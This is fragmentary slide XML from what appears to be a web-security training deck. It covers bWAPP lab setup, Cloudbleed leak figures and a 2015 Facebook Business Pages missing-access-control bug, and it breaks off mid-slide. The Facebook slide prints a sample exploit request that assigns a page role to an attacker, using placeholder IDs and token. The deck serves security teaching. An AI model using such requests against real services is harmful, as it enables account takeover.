          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Check that you have:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bWAPP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> (Either install with XAMPP or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Vmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> as bee-box. Note injection commands will be different with XAMPP on windows, which we will not cover today. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://computersecuritystudent.com/SECURITY_TOOLS/beebox/v2.2/lesson1/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>https://dunnesec.com/2014/10/01/bwapp-bee-bug-installation/)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>VMWare Player/Workstation Trial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Google.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>With bee-box, ensure that you have it set up in bridged mode. (Or the same as your kali machine)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Click Update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bWAPP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, it doesn’t work, edit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/home/bee/Documents/Scripts/WAPP_update_script.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> --no-check-certificate "http://downloads.sourceforge.net/project/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bwapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bWAPP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bWAPP_latest.zip</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mn-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Click install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bWAPP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> and click on the generated link.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35767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5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F097626A-BC5A-49D0-8053-46BB4C05F677}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072640" y="355169"/>
            <a:ext cx="5193792" cy="4177101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3871265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2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC7A8556-2838-4CBA-B52E-26CE596F382A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1702468" y="0"/>
            <a:ext cx="5739063" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3216107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3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{064C95E0-AD5D-48DA-84B9-6669BF0A2DA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1843956" y="0"/>
            <a:ext cx="5456088" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4075155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Shape 624"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="51435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en-US" altLang="ko" sz="5000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>BREAK TIME!</a:t>
            </a:r>
            <a:endParaRPr lang="ko" sz="5000" dirty="0">
              <a:latin typeface="Malgun Gothic"/>
              <a:ea typeface="Malgun Gothic"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1699083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ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Sensitive Data Exposure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" sz="2500" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>“Cloudbleed”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Shape 478"/>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479" name="Shape 479"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2256137" y="1156900"/>
            <a:ext cx="4631724" cy="282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Shape 485"/>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486" name="Shape 486"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="60493"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="183200" y="152400"/>
            <a:ext cx="4128196" cy="4440099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="487" name="Shape 487"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4589100" y="174525"/>
            <a:ext cx="4219500" cy="4418100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Leaked SSL and application keys. Analysis of sample leaked information by cloudflare shows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 67.54 Internal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Cloudflare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Headers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   0.44 Cookies</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>   0.04 Authorization Headers / Tokens</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      0 Passwords</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      0 Credit Cards / Bitcoin Addresses</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      0 Health Records</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      0 Social Security Numbers</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>      0 Customer Encryption Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(confidence level of 99% with a margin of error of 2.5%)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>
              </a:highlight>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>were leaked, however, this does not mean no credit card numbers etc. was leaked, due to sample size.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0">
              <a:latin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lvl="0">
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Missing Function Level Access Control</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="ko" sz="4000" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko" sz="2500" dirty="0">
                <a:latin typeface="Malgun Gothic"/>
                <a:ea typeface="Malgun Gothic"/>
                <a:cs typeface="Malgun Gothic"/>
                <a:sym typeface="Malgun Gothic"/>
              </a:rPr>
              <a:t>Facebook Business Pages </a:t>
            </a:r>
            <a:endParaRPr lang="ko" sz="2500" dirty="0">
              <a:latin typeface="Malgun Gothic"/>
              <a:ea typeface="Malgun Gothic"/>
              <a:cs typeface="Malgun Gothic"/>
              <a:sym typeface="Malgun Gothic"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1050744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Shape 485"/>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2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEA0DEDF-3310-49FF-908F-C7B69A6E7603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167951" y="377906"/>
            <a:ext cx="8780106" cy="3939540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Laxman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Muthiyah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> found that it was possible for a malicious user to use a request to assign admin permissions to himself for a particular Facebook page. A sample request can be seen below:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Request :-</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>POST /&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>page_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>userpermissions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Host : graph.facebook.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Content-Length: 245</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>role=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>MANAGER&amp;user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>target_user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;&amp;business=&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>associated_business_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>access_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>application_access_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Response :-</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>True</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(Laxman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Muthiyah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.7xter.com/2015/08/hacking-facebook-pages.html)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Why was this Significant?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Business pages are a widely used function, and by executing this attack, a malicious user could add himself as an administrator and deny access to the actual manager or administrator.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>How does this relate to Missing Function Level Access Control?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
